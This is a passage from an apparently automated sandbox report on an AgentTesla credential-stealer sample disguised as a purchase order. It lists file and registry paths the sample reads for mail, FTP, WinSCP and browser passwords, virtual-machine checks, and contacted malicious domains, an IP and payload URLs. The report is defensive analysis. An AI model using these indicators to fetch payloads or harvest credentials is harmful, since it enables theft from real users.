Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_00403640

Stealing of Sensitive Information
barindex
Yara detected AgentTesla
Source: Yara match File source: 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 1516, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 1516, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected AgentTesla
Source: Yara match File source: 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 1516, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 624323 Sample: PO#4200000866.exe Startdate: 11/05/2022 Architecture: WINDOWS Score: 100 26 finseb.com 2->26 28 www.finseb.com 2->28 30 2 other IPs or domains 2->30 34 Found malware configuration 2->34 36 Antivirus detection for URL or domain 2->36 38 Multi AV Scanner detection for submitted file 2->38 40 5 other signatures 2->40 8 PO#4200000866.exe 29 2->8         started        signatures3 process4 file5 20 C:\Users\user\AppData\Local\...\System.dll, PE32 8->20 dropped 22 C:\Users\user\AppData\Local\...\library.dll, PE32 8->22 dropped 24 C:\Users\user\...\DeviceServicePlugin.dll, PE32+ 8->24 dropped 42 Writes to foreign memory regions 8->42 44 Tries to detect Any.run 8->44 12 CasPol.exe 15 11 8->12         started        16 CasPol.exe 8->16         started        signatures6 process7 dnsIp8 32 finseb.com 131.226.4.8, 443, 49760, 49761 UNASSIGNED United States 12->32 46 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->46 48 Tries to steal Mail credentials (via file / registry access) 12->48 50 Tries to harvest and steal ftp login credentials 12->50 56 2 other signatures 12->56 18 conhost.exe 12->18         started        52 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->52 54 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 16->54 signatures9 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
131.226.4.8
 finseb.com United States
16797 UNASSIGNED true

Contacted Domains

Name IP Active
solucionest.com.ar 192.185.112.181 true
finseb.com 131.226.4.8 true
ftp.solucionest.com.ar unknown unknown
www.finseb.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://www.finseb.com/qwer/COrg_ZBOJvB194.bin false
  • Avira URL Cloud: safe
 unknown
http://finseb.com/qwer/COrg_ZBOJvB194.bin true
  • Avira URL Cloud: safe
 unknown